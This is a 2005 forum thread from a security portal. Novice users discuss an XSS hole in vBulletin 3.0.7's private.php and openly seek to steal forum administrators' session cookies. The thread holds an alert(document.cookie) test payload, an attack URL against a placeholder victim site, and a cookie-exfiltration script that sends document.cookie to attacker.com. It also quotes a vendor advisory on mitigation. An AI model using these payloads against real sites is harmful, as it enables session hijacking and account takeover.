Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
June 16, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 131
Members: 0
Total: 131
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> vbulletin 3.0.7
Post new topic  Reply to topic View previous topic :: View next topic 
vbulletin 3.0.7
PostPosted: Tue Jul 26, 2005 9:58 pm Reply with quote
outlawsys
Regular user
Regular user
 
Joined: Jun 11, 2005
Posts: 12




is there a security hole or bug in vbulletin 3.0.7?
View user's profile Send private message
PostPosted: Thu Jul 28, 2005 11:40 pm Reply with quote
diegocure15
Active user
Active user
 
Joined: Sep 22, 2004
Posts: 27




yes i like to know that too!!! someone????
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 9:16 am Reply with quote
outlawsys
Regular user
Regular user
 
Joined: Jun 11, 2005
Posts: 12




i search the internet and i found a XSS in vBulletin 3.0.7.There is a bug in private.php
i try this code
<script>javascript:alert(document.cookie);</Script>
and i see my cookie informations.
Now how can i use this codes to take admin's cookie informations?
if someone can give me answer, i will be very pleased thankz a lot
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 5:36 pm Reply with quote
diegocure15
Active user
Active user
 
Joined: Sep 22, 2004
Posts: 27




outlawsys wrote:
i search the internet and i found a XSS in vBulletin 3.0.7.There is a bug in private.php
i try this code
<script>javascript:alert(document.cookie);</Script>
and i see my cookie informations.
Now how can i use this codes to take admin's cookie informations?
if someone can give me answer, i will be very pleased thankz a lot



How did you do that? http://www.webvictim.com/private.php?do=<script>javascript:alert(document.cookie);</Script> Question Question Question
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 7:49 pm Reply with quote
outlawsys
Regular user
Regular user
 
Joined: Jun 11, 2005
Posts: 12




you enter the private message and sent a private message someone and enter the code to SUBJECT. and the preview message
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 8:54 pm Reply with quote
diegocure15
Active user
Active user
 
Joined: Sep 22, 2004
Posts: 27




thanks now we have to find a way that the admins can see that and pull their cookies off it.

i tried this... but too long to fit into subject box


<script>document.write("<img src=http://attacker.com/? + document.cookie + ?>?)</script>
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 11:36 pm Reply with quote
Matt
Regular user
Regular user
 
Joined: Jul 30, 2005
Posts: 7




thats not what you need to do at all.
take a look at a similar exploit for ipb and phpbb using bbcode.

but i did find this on a vbulliten support site:
Quote:
An XSS issue exists within vBulletin 3 in versions up to and including 3.0.7.

Fortunately, the circumstances that allow this XSS issue to be exploited are quite rare so the majority of installations dont have to worry.

Your installation is only vulnerable if:

* You do not Allow Wild Card Searchs or
* You have a very large Search Index Minimum Word Length value (more than ten characters)

If these conditions apply to your board, you can easily secure your installation against XSS exploitation by turning on search wild cards and setting a smaller (6 or less) value for Search Index Minimum Word Length.

Both of these settings can be found in vBulletin Options > Message Searching Options (Default Search)

If you are unable to change these settings, you can simply overwrite the existing includes/functions_search.php file with the one attached to this thread. If neither of the above listed settings apply to your vBulletin Forum, there is no need to download this file at all.

If you need it, you can get the file here: http://www.vbulletin.com/forum/showthread.php?t=133459


there ya go, they admited themself they left a bug in it.
apparently its not big enough to allow a new version to be released, but still can cause some damage.
ive tried to look into this, but i couldnt find anything, than again my hacking skills arnt good at all.
View user's profile Send private message MSN Messenger
PostPosted: Wed Aug 03, 2005 10:54 am Reply with quote
outlawsys
Regular user
Regular user
 
Joined: Jun 11, 2005
Posts: 12




is there anyone know about something about vbulettin XSS.if someone helps us we will b very pleased
View user's profile Send private message
PostPosted: Wed Aug 03, 2005 10:20 pm Reply with quote
diegocure15
Active user
Active user
 
Joined: Sep 22, 2004
Posts: 27




well i found this.... http://lnx.hackerscenter.com/Forums/index.php?showtopic=1422&st=0 but its bit difficult to understand but at least they are working on it read all post on that topic and come back here and tell me if you got something else and what did you undertood.

seeya
View user's profile Send private message
PostPosted: Fri Aug 05, 2005 2:23 am Reply with quote
Matt
Regular user
Regular user
 
Joined: Jul 30, 2005
Posts: 7




yeah i saw that already, i posted. i dont see how that can work though.
View user's profile Send private message MSN Messenger
vbulletin 3.0.7
  www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.152 Seconds